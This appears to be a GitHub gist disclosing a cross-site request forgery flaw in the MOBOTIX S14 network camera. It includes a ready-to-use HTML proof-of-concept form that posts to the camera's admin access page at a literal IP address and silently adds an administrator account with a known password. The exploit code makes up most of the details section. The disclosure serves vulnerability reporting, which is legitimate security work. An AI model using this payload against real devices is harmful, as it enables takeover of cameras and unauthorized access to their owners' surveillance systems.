Created
May 29, 2019 13:37
Star
You must be signed in to star a gist
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Summary | |
The MOBOTIX S14 Camera did not implement any mechanism to avoid cross-site request forgery (CSRF) attacks. | |
Impact | |
Successful exploitation of this vulnerability can lead to the takeover of the device. | |
Deatils | |
The MOBOTIX S14 Camera did not implement any mechanism to avoid cross-site request forgery attacks. | |
This can lead to allow a local account password to be changed without the knowledge of the authenticated user. | |
POC - the following PoC will add a test user, with a password of 'aaaaa'. Note, this user has admin priviledges. | |
<html> | |
<body> | |
<form method="POST" action="http://82.71.22.180:8001/admin/access"> | |
<input type="hidden" name="user_name_0" value="admin"/> | |
<input type="hidden" name="user_group_0" value="admins"/> | |
<input type="hidden" name="user_passwd_a_0" value="***"/> | |
<input type="hidden" name="user_passwd_b_0" value="***"/> | |
<input type="hidden" name="user_name_1" value="rayspeed"/> | |
<input type="hidden" name="user_group_1" value="users"/> | |
<input type="hidden" name="user_passwd_a_1" value="***"/> | |
<input type="hidden" name="user_passwd_b_1" value="***"/> | |
<input type="hidden" name="user_name_2" value="test"/> | |
<input type="hidden" name="user_group_2" value="admins"/> | |
<input type="hidden" name="user_passwd_a_2" value="aaaaa"/> | |
<input type="hidden" name="user_passwd_b_2" value="aaaaa"/> | |
<input type="hidden" name="sv_passwd_a" value=""/> | |
<input type="hidden" name="sv_passwd_b" value=""/> | |
<input type="hidden" name="save_config" value="Set"/> | |
<input type="submit" value="Submit"> | |
</form> | |
</body> | |
<html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment